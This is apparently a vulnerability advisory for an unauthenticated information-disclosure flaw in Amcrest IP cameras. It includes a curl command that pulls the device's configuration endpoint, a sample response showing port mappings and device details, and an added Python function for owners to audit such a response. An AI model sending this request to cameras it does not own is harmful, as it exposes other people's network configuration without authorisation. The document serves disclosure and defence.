Overview

This report highlights an Information Disclosure vulnerability in multiple AMCREST IPC devices. The vulnerability stems from a lack of proper access control: sensitive configuration data can be retrieved through an unauthenticated HTTP request. It affects over 149,151 devices on the Internet.

Affected Devices

CWE

CWE-200: Information Exposure

Affected Component

URI: http://[IP_address]/web_caps/webCapsConfig

Description: This endpoint returns detailed device information, including the device type, vendor, network configuration (IP addresses and port mappings), system capabilities, and software/plugin versions.

Exploitation

curl -X GET "http://[IP_address]/web_caps/webCapsConfig" -H "Accept: */*"

HTTP response example:

{
  "Anonymous": false,
  "HttpPort": {
     "InnerPort": 80,
     "OuterPort": 8080
  },
  "HttpsPort": {
     "InnerPort": 443,
     "OuterPort": 443
  },
  "RTSPPort": {
     "InnerPort": 554
  },
  "deviceType": "IP2M-841W",
  "eth0": {
     "IPAddress": "",
     "IPv6Address": ""
  },
  "eth2": {
     "IPAddress": "",
     "IPv6Address": ""
  },
  "vendor": "Amcrest",
  ...
}
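
For a device owner checking their own camera, the following added example (not part of the original report) takes the status code and body captured from an unauthenticated request to this endpoint and lists which of the fields shown above are disclosed; it also handles a refused request or a non-JSON body. The function name and the grouping of fields are assumptions, and the sample body is constructed from the response above.

```python
import json

# Keys taken from the response shown on this page; grouping them into
# "identity" and "port mapping" is an assumption made for this example.
IDENTITY_KEYS = ("deviceType", "vendor")
PORT_KEYS = ("HttpPort", "HttpsPort", "RTSPPort")


def audit_webcaps_response(status, body):
    """Report what an unauthenticated webCapsConfig response discloses."""
    result = {"exposed": False, "findings": []}
    if status != 200:
        return result  # request refused or redirected: nothing returned
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return result  # e.g. an HTML login page instead of the JSON document
    if not isinstance(data, dict):
        return result

    findings = result["findings"]
    for key in IDENTITY_KEYS:
        if data.get(key):
            findings.append(f"identity: {key}={data[key]}")
    for key in PORT_KEYS:
        if isinstance(data.get(key), dict):
            for side, port in sorted(data[key].items()):
                findings.append(f"port mapping: {key}.{side}={port}")
    for name, value in sorted(data.items()):
        # Interface blocks (eth0, eth2, ...) are recognised by their address keys.
        if isinstance(value, dict) and "IPAddress" in value:
            addrs = [a for a in (value.get("IPAddress"), value.get("IPv6Address")) if a]
            findings.append(f"interface: {name} addresses={addrs or 'blank'}")
    result["exposed"] = bool(findings)
    return result


# Constructed sample: the fields visible in the response on this page.
SAMPLE_BODY = json.dumps({
    "Anonymous": False,
    "HttpPort": {"InnerPort": 80, "OuterPort": 8080},
    "HttpsPort": {"InnerPort": 443, "OuterPort": 443},
    "RTSPPort": {"InnerPort": 554},
    "deviceType": "IP2M-841W",
    "eth0": {"IPAddress": "", "IPv6Address": ""},
    "eth2": {"IPAddress": "", "IPv6Address": ""},
    "vendor": "Amcrest",
})
```

Calling `audit_webcaps_response(200, SAMPLE_BODY)` returns the list of findings; an `exposed` value of `False` after access control is in place confirms the endpoint no longer answers unauthenticated requests with the configuration document.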